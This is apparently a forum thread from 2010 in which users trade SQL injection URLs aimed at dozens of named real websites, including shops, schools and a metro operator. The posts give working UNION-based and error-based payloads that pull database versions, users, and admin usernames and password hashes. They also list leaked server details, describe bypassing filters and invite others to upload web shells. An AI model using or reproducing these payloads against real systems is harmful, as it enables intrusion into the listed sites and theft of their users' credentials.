http://www.agetec.com/catalog/news_detail.php?id=-41+union+select+1,2,3,user(),5,6,7--
Code:
http://www.moskva-rabota.ru/index.php?id=-398+union+select+1,2,group_concat(table_name),4+fr om+information_schema.tables--
http://www.artbukhman.com/payment.php?gal=-2&sub=-64&id=-264%20union%20select%201,version(),3,4,5,6,7%20--
5.1.47-community-log
joomla
tp.by
PR 5
TIC 60
Code:
http://www.tp.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
cnko.net
PR 2
TIC 30
Code:
http://www.cnko.net/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
tdzemi.ru
PR 2
TIC 30
Code:
http://www.tdzemi.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
ef2012.com
PR 3
TIC 10
Code:
http://www.ef2012.com/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,usernam e,password%29,3,4,5,6%20from%20jos_users%23
calcweb.org
PR 5
Code:
http://www.calcweb.org/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,usernam e,password%29,3,4,5,6%20from%20jos_users%23
forward.by
PR 2
Code:
http://forward.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
rcl.ru
PR 4
TIC 20
Code:
http://www.rcl.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,u sername,password%29,3,4,5,6%20from%20jos_users%23
swedstyle.ru
TIC 10
Code:
http://www.swedstyle.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,u sername,password%29,3,4,5,6%20from%20jos_users%23
A reminder: in Joomla the admin panel is at /administrator by default
Official website of FC "Khimki"
Code:
http://www.fckhimki.ru/modules/content/index.php?current_id=-37+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(%20),database()),10,11,12,13+--+
Database Version: 4.0.27-max-log
Database name: fckhimki_new1
User name: fckhimki_new1@v2.valuehost.ru
==================================================
Sigmadesigns.com
Code:
http://www.sigmadesigns.com/solutions_subcat.php?id=1'+or+1+group+by+concat(mi d((select+TABLE_NAME+from+information_schema.table s+where(table_schema!=0x696E666F726D6174696F6E5F73 6368656D61)limit+0,1),1,63),floor(rand(0)*2))havin g+min(0)+--+
Database Version: 5.1.30-community-log
Database name: dd04318780
User name: i_dd04318780@www.sigmadesigns.com
==================================================
Worldmusicinstitute.org
Code:
http://www.worldmusicinstitute.org/sections.php?id=18+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+--+
Database Version: 4.1.25-Debian_mt1-log
Database name: worldmusicinstitute_org_-_ucms
User name: worldmusicinst@64.13.192.201
==================================================
http://cats1004.com/info_list.php?categoryi=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion())+--
Database: realty_cats1004
User: realty_cats1004@localhost
Version: 4.0.22-log
http://www.spynets.com/cheats/details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--
http://www.theart.ru/cgi-bin/performance.cgi?id=9405'+and+1=0+UnIon+selECt+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,group_concat(table_name),26,27,28,29,30,3 1,32+from+information_schema.tables+where+table_Sc hema=0x74686561727472755f6f7264656e+--+
TIC: 325 PR: 4
http://polbileta.ru/cgi-bin/cinema/performance.cgi?id=76+and+1=0+UnIon+selECt+1,group _concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41+From+information_sc hema.schemata+--+
P.S. TreV@N, I'm sure half of your SQL injections are reposts!
http://www.bheru.com/indianews/?l=4&id=3414+and+1=0+union+select+unhex(hex(concat_ws(0 x3a,user_name,password)))+from+admininfo+--
Database: bherudb
User: bherudbuser@localhost
Version: 5.0.79
A shell uploads in 2 clicks, and the page source can be edited :3
http://www.nexusarts.com.au/view_performer_details.php?id=61+UnIon+selECt+1,co ncat_ws(0x3a,user_name,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66+from+users+--
Database: nexusprd
User: nexusprd@97.74.24.197
Version: 5.0.91-log
A really fat site... I never managed to find the admin panel; the password is in the hash databases.
premiera-salon.com
TIC 20
Code:
http://premiera-salon.com/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
15-sotok.ru
PR 2
Code:
http://www.15-sotok.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
white-line.ru
TIC 10
PR 1
Code:
http://www.white-line.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
www.master-obraza.ru
TIC 10
Code:
http://www.master-obraza.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
ies-nn.ru
PR 1
Code:
http://www.ies-nn.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
pioner-forma.ru
TIC 10
Code:
http://www.pioner-forma.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
12-school.ru
PR 1
Code:
http://www.12-school.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
Lasteeck
30.10.2010, 23:19
http://www.tradegrupp.ru/news.php?nid=25+and+1=0+union+select+1,concat_ws%2 80x3a,user,password%29,3,4,5,6+from+mysql.user+lim it+1,1--
medpoisk.ru
TIC 650
PR 5
Code:
http://www.medpoisk.ru/catalog_view.php?region_id=-2+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4--
fmjd.org
TIC 110
PR 5
Code:
http://fmjd.org/news.php?nid=-421+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5,6,7,8,9,10--
mzma.net
TIC 120
PR 1
Code:
http://www.mzma.net/club/articles/read.php?id=-100+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6--
irsp.org.pk
PR 4
Code:
http://irsp.org.pk/news.php?nid=-15+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
http://www.hometrend.ca/product.php?productId=83&catId=-0102'+union+select+1,concat_ws(0x3a3a,version(),us er(),database())+--+
http://www.utmsports.com/athlete.cfm?id=-1057+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,ver sion(),@@version_compile_os,user(),database()),8,9 ,10,11,12,13,14,15+--+
http://www.corfida.org/index.php?id=-5+union+select+unhex(hex(concat_ws(0x3a,0x78,datab ase(),user(),version())))/*
Database: corfida_org_-_cms
User: corfida_@localhost
Version: 4.1.22
http://www.eurobirding.com/birdingmagazines/artinfo.php?id=-9142+union+select+concat_ws(0x3a,database(),user() ,version())+--+
Database: eurobirdingcom01
User: eurobirdingcom01@87.238.248.116
Version: 5.0.90-log
http://www.aoecs.org/news/news.php?id=-41+/*!and*/1=2+/*!union*/select/*!1,2,concat_ws(0x3a,database(),user(),version()), 4,5,6,7,8*/+--+
Database: aoecs_current
User: aoecs_aoecs@localhost
Version: 5.1.50
There is a filter in place. But it is bypassed fairly easily.
sayitontheweb.com
PR 5
Code:
http://www.sayitontheweb.com/~smith/projectdetails.php?id=-26+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
allanhouser.com
PR 5
Code:
http://www.allanhouser.com/newsDetail.php?id=-21+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8--
southernpowerlifting.com
PR 3
Code:
http://www.southernpowerlifting.com/contest_results.php?id=-121+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version())--
feicuidao.com
PR 4
Code:
http://www.feicuidao.com/jqzx_look.php?id=-11+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,1
cyberspacesupport.com
PR 3
Code:
http://www.cyberspacesupport.com/question.php?question_id=-15681+union+select+1,2,3,concat_ws(0x3a,user(),dat abase(),version()),5,6,7,8,9--
Strilo4ka
31.10.2010, 14:48
PR 4, TIC 90
http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201 ,2,3,4,'5',6,7,8,9%23
http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201 ,2,3,4,0x27,6,7,8,9%23 -> 2-d order inj.
HTML:
http://www.lpb-company.ru/enc/?igla=-1+union+select+all+1,2,3,table_name,column_name,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28+from+information_schema.columns+order +by+1+desc+limit+0,1+--+
moodoone
31.10.2010, 19:56
I'm back after a short break)
Code:
http://www.beigbeder.net/pages/livre.php?id=1-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Code:
http://www.les-racines-du-ciel.com/boutiques.php?num=87-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
Code:
http://paroles.webfenua.com/chanson.php?id=2233-999.9+union+select+1,2,user%28%29,4--
http://concursos.colombiaaprende.edu.co/expediciones_botanicas/ver_reverdecimiento.php?id=274+group+by+concat(ver sion(),floor(rand(0)*2))having+min(0)+or+1--
http://www.verdadcolombia.org/archivos/VerDocumento.php?Id=11+and+1=0+union+select+1,2,3, 4,5,group_concat(user,char(58),pass)+from+user_seg
http://www.sdintlgroup.net/properties-info.php?id=56+union+select+1,2,version(),concat_w s(0x3a,id,username,password),5,6,7,8,9,10,11,12+fr om+members+limit+0,1
http://www.vfdnet.de/verband/nordrhein-westfalen/index.php?verbandid=9&info_id=4231'+or+1+group+by+concat(concat_ws(0x3a3 a,version(),@@version_compile_os,user(),database() ),floor(rand(0)*2))having+min(0)+or+1+--+
http://www.westgold.de/html/info.php?id=105+and+1=2+union+select+1,version(),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24+--+
http://www.sportklettern-hessen.de/home/info.php?id=-185+union+select+1,2,3,concat_ws(0x3a3a,version(), @@version_compile_os,user(),database()),5,6,7+--+
http://www.divid-pro.de/product_info.php?id_product=-3+union+select+1,2,version(),4,5,@@version_compile _os,7,concat(user(),0x3a3a,database()),9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32
http://www.campaignsitebuilder.com/templates/displayfiles/Tmpl13.asp?siteid=524&pageid=8510&trial=false&blogid=338-999.9+union+select+@@version,2,3,4,5,6,7,8,9,10--
http://www.flvwdialog.de/php/db/info.php?id=-5711+union+select+1,2,3,4,5,6,7,8,concat(@i:=0x00, @o:=0x0d0a,benchmark(977,@o:=CONCAT(@o,0x0d0a,(SEL ECT @i:=concat(BenutzerID,0x3a,Benutzername,0x3a,Passw ort,0x0a7c) from us_benutzer where BenutzerID>@i order by BenutzerID LIMIT 1))),@o),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73 ,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,9 0+--+
moodoone
01.11.2010, 00:17
Code:
http://www.lsp-fr.com/rdv_full.php?num=9-999.9+union+select+1,2,version%28%29,4,5,6,7,8,9,1 0,11,12--
Code:
http://www.phytotherapia.eu/informations_medicales.php?num_info=509-999.9+union+select+1,2,version%28%29,4--
+ more
HellFire
01.11.2010, 08:41
Code:
http://www.theark.cc/mymovie_detail.php?id=1+UNION+SELECT+1,2,CONCAT(0x 7873716C696E6A626567696E,Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31--
Database Version: 5.0.77
Database name: mymedia
User name: root@10.10.100.101
Code:
http://hummeraccessories.cc/viewProduct.php?id=1+UNION+SELECT+CONCAT(0x7873716 C696E6A626567696E,Version(),0x2F2A2A2F,Database(), 0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+LIMIT+ 1,1--
Database Version: 5.0.91-log
Database name: hummerguys
User name: hummerguys@68.178.254.137
Shops
Code:
http://www.barrywalker.com/cat.asp?cat=-12+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5--
Code:
http://www.ishraqa.com/newlook/Art_Cat.asp?Cat_Id=-13+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),database(),version()),10--
Code:
http://www.hightechcredit.com/products.php?subcat=224+and+1=0+union+select+1,con cat_ws(0x3a,user(),database(),version()),3,4,5,6--
Code:
http://prima-footwear.com/products.php?subcat_id=-107+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, user(),database(),version()),11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
Code:
http://www.protech.net/product.php?product_id=-92+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
Code:
http://www.antique-tables.co.uk/productdetails.asp?prodid=-159+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20--
P.S. no reposts, as far as I can tell
-PRIVAT-
01.11.2010, 15:28
Code:
http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619' or 1 group by concat((select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate(0x70617373776f7264,column_name)!=0 and table_schema=0x6169345f656e74657270726973655f6462/**/limit/**/0,1),floor(rand(0)*2))having min(0) or 1-- 1
http://www.cornerstone-properties.com/agents_details.php?agent_ID=1758'%20or%201%20group %20by%20concat(version(),floor(rand(0)*2))having%2 0min(0)%20or%201--%201
http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619%27%20or%201%20gro up%20by%20concat%28%28select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate%280x70617373776f7264,column_name%29!=0%20an d%20table_schema=0x6169345f656e74657270726973655f6 462/**/limit/**/0,1%29,floor%28rand%280%29*2%29%29having%20min%280 %29%20or%201--%201
http://www.barkalowhomes.com/agents_details.php?agent_ID=6244%27%20or%201%20gro up%20by%20concat%28%28select/**/column_name/**/from/**/information_Schema.columns/**/where/**/table_name=0x6169635f636c69656e7473/**/limit/**/26,1%29,floor%28rand%280%29*2%29%29having%20min%28 0%29%20or%201--%201
http://www.gloor.com/agents_details.php?agent_ID=480%27%20or%201%20grou p%20by%20concat%28version%28%29,floor%28rand%280%2 9*2%29%29having%20min%280%29%20or%201--%201
http://www.mockrealty.com/agents_details.php?agent_ID=1522%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.phippsrealty.com/agents_details.php?agent_ID=3192%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.nixtann.com/agents_details.php?agent_ID=8432%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.marron-gildea.com/agents_details.php?agent_ID=4010%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.sirentechnology.co.uk/product_info.php/products_id/550%27%20or%201%20group%20by%20concat%28version%28 %29,floor%28rand%280%29*2%29%29having%20min%280%29 %20or%201--%201
http://www.interbatteries.ca/product_info.php/products_id/2598%27%20or%201%20group%20by%20concat%28version%2 8%29,floor%28rand%280%29*2%29%29having%20min%280%2 9%20or%201--%201
http://www.art21galerie.de/artinfo.php?id=80%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&pic=47
http://www.coolthings.nl/artinfo.php?id=113%20union%20select%201,2,3,concat _ws(0x3a,login_name,password),5,6,7,8%20from%20cms _auth_user--
http://www.collectart.de/artinfo.php?id=96%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&lang=de
http://galerie-fries.de/artInfo.php?id=-610%20union%20select%201,version(),3,4,5,6--
http://art26.de/artinfo.php?id=10%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&pic=15&lang=
http://www.access-networks.eu/artinfo.php?id=-514%20union%20select%201,2,version(),4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,0,0,1--&_cat=1
http://moto-mondo.com/modeli.php?marka_id=-5%20union%20select%201,concat_ws(0x3a,iduser,passw d),3%20from%20admin--
http://www.mypromofits.com/newinfo.php?id=-102%20union%20select%201,version(),3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8--
http://www.joebar.org/p.php?ID=-5%20union%20select%201,2,version(),4,5,6,7,8,9--
http://redwheelweiser.com/p.php?id=-2%20union%20select%201,version(),3,4,5,6,7,8,9--
http://www.edinburghnapierdegreeshow.com/2009/des/s.php?id=16%20or%201%20group%20by%20concat((select user_pass from wp3_users limit 0,1),floor(rand(0)*2))having%20min(0)%20or%201--%201
http://www.fairfaxtimes.com/cms/story.php?id=1050'%20or%201%20group%20by%20concat( version(),floor(rand(0)*2))having%20min(0)%20or%20 1--%201
P.S. No reposts!
http://sig.ucaldas.edu.co/gestionDocumental/MECI/formAuditoria.php?codDoc=504+union+select+null,nul l,cast(usename||chr(58)||passwd as int),null,null,null+from+pg_shadow--+
http://sig.ucaldas.edu.co/info
HellFire
01.11.2010, 19:45
Code:
http://ring.abandonware.it/commenti.php?num=-1+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A6265 67696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F, User(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13 ,14,15,16--
Database Version: 4.0.30-standard-log
Database name: Sql10475_5
User name: Sql10475@62.149.141.67
fc-utd.co.uk
PR 5
Code:
http://www.fc-utd.co.uk/players.php?player_id=-155+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9,10,11,12,13,14--
mereste.net
PR 3
Code:
http://www.mereste.net/weblog.php?num=-325+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6--
bungeeco.com
PR 2
Code:
http://www.bungeeco.com/product_detail.php?id=-374+union+select+1,2,3,4,5,concat_ws(0x3a,user(),d atabase(),version()),7,8,9,10,11,12,13,14,15,16,17--
www.panabodehomes.com
PR 2
Code:
http://www.panabodehomes.com/whats_new.php?article_id=-14+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
villasignori.it
PR 1
Code:
http://www.villasignori.it/galleria_detail.php?id=-11+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
http://www.latinamericanpost.com/index.php?mod=seccion&secc=2+or+1+group+by+concat(version(),floor(rand(0 )*2))having+min(0)+or+1--
bloodAngel
02.11.2010, 00:10
Code:
http://www.ipodarcade.com/game.php?id=597-999.9+union+select+1,2,concat%28user%28%29,databas e%28%29,version%28%29%29,4,5,6,7,8,9,10--
ipodarc_ac883@localhostipodarc_db5.0.91-community
Code:
http://www.tenebril.com/src/info.php?id=101500900-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
Code:
http://www.sligotoday.ie/details.php?id=5784-999.9+union+select+1,concat%28version%28%29,databa se%28%29,user%28%29%29,3,4,5,6,7,8,9--
5.0.83-community-logdb1062096_sligotodayu1062096_user@172.16.4.31
http://www.cafespb.ru/resto.php?id=715+and+1=0+UnIon+selECt+1,2,group_co ncat(schema_name),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+fro m+information_schema.schemata+--+
TIC: 100 PR: 2
JohnnyBGoode
03.11.2010, 03:24
http://nyx.su/index.php?do=out&id=195599+or+1+group+by+concat((select+concat(vers ion(),0x3a,user(),0x3a)),floor(rand(0)*2))+having+ avg(0)+--+
5.0.90:vacond_wp@localhost
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,file_priv,4 ,5,6,7,8,9+from+mysql.user+where+user='alexey1'+--+
TIC: 275
http://www.ock.ru/news/?lang=rus&id=133'+and+1=0+union+Select+1,2,3,version(),5,6,7 ,8+--+
TIC: 140 PR: 3
Lasteeck
04.11.2010, 01:27
http://www.hiddenmickeysguide.com/catalog.php?id=14+and+1=0+union+select+concat_ws%2 80x3a,username,password%29,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user s--
/wp-admin
auth_root
04.11.2010, 01:47
Sex shop. There's a lot more interesting stuff on the server. I've notified the admins, so until they close the bug, please don't kill the site. Purely for informational purposes. Be decent people, respect other people's work.
Besides, it's a criminal offense.
http://www.annaspansextoys.com/detail.php?addtocart=8&id=8/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4,5,count(email),7,8,9,10,11,12,13,14+from+ memberitems--+
Version five.
http://www.sice.ru/news.phtml?id=483+and+1=0+union+selECt+1,2,3,group _concat(table_name),5,6,7,8,9,10,11,12+from+inform ation_schema.tables+Where+table_schema=0x736963657 76562+--+
TIC: 750 PR: 1
http://platformasoft.ru/news.php?id=19'+and+1=0+union+select+1,2,concat_ws (0x3a,login,pass),4,5,6+from+users+--+
PR: 1
KandidaT'S
04.11.2010, 13:31
http://www.ontariocountydev.org/directoryDetailPrinter.php?id=298-56+union+select+1,concat_ws%28version%28%29,user%2 8%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15--
http://www.freebooknotes.com/book.php3?id=346645645654654656+union+select+1,con cat_ws(version(),user()),3 ,4,5,6,7,8,9,10,11--
http://www.pep.ph/podcast.php?id=184-999.9+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws% 28version%28%29,user%28%29%29,12,13--
http://mind.textdriven.com/db/record.php?ID=9394-999.9+union+select+1,concat_ws%28version%28%29,use r%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15--
Code:
http://www.presscom.kiev.ua/?page=news&nid=-580+union+all+select+1,2,3,concat_ws(char(58),@@ve rsion,user(),database(),@@version_compile_os),5,6, 7,8--
4.1.22-log u_presscom@localhost presscom pc-linux-gnu
http://letterboxdvd.co.uk/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7
http://003.saratov.ru/images/head_03.jpg
http://003.saratov.ru/podrubr.php?idr=95&gsn=-93+and+1=2+union+select+concat(@@version,0x20,user (),0x20,database(),0x20,@@version_compile_os)+--
5.0.90-log 003@ns.intercom.ru 003 portbld-freebsd8.0
http://003.saratov.ru/podrubr.php?idr=95&gsn=-93+and+1=2+union+select+concat_ws(0x3a,login,pass) +from+users+limit+0,1+--
http://baseclub.ru/music.php?id=-6+union+select+1,2,concat_ws(0x3a,id,Password,Emai l),4,5+From+userbase--
I'd be grateful if someone uploads a shell.
http://www.soud.ru/foto/?id=-249+union+select+1,2,3,4,5,6,7,@@version+--+
TIC 700
http://www.neptun.spb.ru/news/readnews.html?id=119'+and+1=0+UnIon+selECt+1,2,3,4 ,5,group_concat(table_name+separator+0x3c62723e),7 ,8,9+from+information_schema.tables+where+table_sc hema=0x6e657074756e31+--+
TIC: 160
Code:
http://www.itvarnews.net/news.php?j=99999+UNION+SELECT+1,2,concat_ws(0x3a,u ser(),database(),version()),4,5,6,7--
Version: 5.0.91-community
Database: itvarnew_itvarnews
User: itvarnew_dbuser@localhost
PR 4, DMOZ
http://city-library.uz.ua/kniga.php?id=-6+union+select+1,group_concat(0x0b,log,0x3a,pass)+ from+user-- MEGA DESIGN...
http://www.metropoliten.kiev.ua/cars/train.php?id=3+and+1=0+union+select+1,2,group_conc at(0x0b,user,0x3a,password),4,5,6,7,8,9+from+mysql .user--
Kyiv Metro, TIC 300
http://www.pro-passivhaus.com/index.php?page=22&lang=-1+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()),1),floor(rand(0)*2)))--
TIC 50
http://www.obogrev.ru/page.php?id=-22+union+select+group_concat(0x0b,table_name),2+fr om+information_schema.tables--
TIC 200
http://www.procctv.ru/page.php?id=-469+union+select+1,group_concat(0x0b,login,0x3a,pa ssword)+from+users--
TIC 180
http://www.banketpiter.ru/index.php?item=-124+or+(select+count(*)from(select+1+union+select+ 2+union+select+3)x+group+by+concat(mid((select+ver sion()),1),floor(rand(0)*2)))--
JohnnyBGoode
05.11.2010, 23:18
http://www.trancefan.ru/view_post.php?id=-535'+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8+--+
Database: Deffa_trance
Version:5.0.84-percona-highperf-b18
User: Deffa_admin@91.195.124.11
http://www.annihilatormetal.com/index.php?page=1'+and+1=2+union+select+concat_ws(0 x3a,database(),version(),user())+--+
Database:mediaforce
Version:5.1.39-log
User:takun@evili.com
http://debbie-harry.ru/page.php?id=-575'+union+select+1,group_concat(database(),0x3a,v ersion(),0x3a,user())+--+
Database:karakovski_frozen
Version:5.1.47-rel11.2-log
User:karakovski@localhost
nemaniak
06.11.2010, 03:15
www.scinsnews.com PR-5
Code:
http://www.scinsnews.com/newsroom_detail.php?newsID=-383+union+select+1,2,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,4,5,6,7,8,9,10,11,1 2,13,14,15,16+--+
Code:
4.1.22-standard:scinsnew_admin@localhost:scinsnew_databas e
www.websmartconsulting.com PR-5
Code:
http://www.websmartconsulting.com/portfolio_profile.php?ClientID=-87+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8,9,0,11,12, 13,14,15,16,17,18,19,20,21,22,23,24+--+
Code:
5.1.35:databases@web2.stormweb.net:websmart
www.abca.on.ca PR-5
Code:
http://www.abca.on.ca/newsfull.php?NewsID=-168+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws( 0x3a,version(),user(),database()),13,14,15,16,17,1 8+--+
Code:
4.1.20:abcabase@localhost:ausablebayfield
www.debtontario.com PR-5
Code:
http://www.debtontario.com/article.php?ArticleID=-8+union+select+1,2,3,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,5,6,7,8,9+--+
Code:
4.1.20:hpdata6@localhost:hpfscredit
bloodAngel
06.11.2010, 12:56
Code:
http://www.greenmountgarden.co.uk/factsheet/factsheet.php?fact_id=16-999.9+union+select+1,2,3,4,concat%280x3a,version%2 8%29,database%28%29,user%28%29%29,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22--
5.1.48-community-logweb116-greenmweb116-greenm@79.170.44.116
Code:
http://www.ipublishcentral.com/news_detail.php?id=50-999.9+union+select+1,2,3,concat%280x3a,version%28% 29,database%28%29,user%28%29%29,5,6,7,8,9--
5.0.77-loggamma_ipcgamma_ipc@app6.impelsys.com
moodoone
06.11.2010, 16:03
German shop
Code:
http://www.insideoutshop.de/product_info.php?products_id=2246%20and%28select%2 01%20from%28select%20count%28*%29,concat%28%28sele ct%20%28select%20%28SELECT%20concat%280x7e,0x27,cu stomers_password.customers_email,0x27,0x7e%29%20FR OM%20%60insideout_osc_shop%60.customers_password%2 0LIMIT%203,1%29%20%29%20from%20information_schema. tables%20limit%200,1%29,floor%28rand%280%29*2%29%2 9x%20from%20information_schema.tables%20group%20by %20x%29a%29%20and%201=1
http://www.tyres4wheels.ru/basket/?action=1&addg=4939;select+null,version()::int,null+from+pg_ user--
HellFire
07.11.2010, 06:00
Code:
http://www.noisehead.com/artist/nh_artist.php?artist_id=1+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Ver sion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7 873716C696E6A656E64),0x71),0x71),2--
Database Version: 5.0.77-log
Database name: nhGeek
User name: nhGeek@localhost
Code:
http://www.edbydesign.com/storyteller-page.php?ID=100-99.9+UNION+SELECT+CONCAT(0x7873716C696E6A626567696 E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( ),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11--
Database Version: 5.0.83-community
Database name: edbydesign
User name: ebd@localhost
skills.library.leeds.ac.uk
PR 6
Code:
http://skills.library.leeds.ac.uk/transcript.php?ID=-17+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5--
shoppingtoursshanghai.com
PR 4
Code:
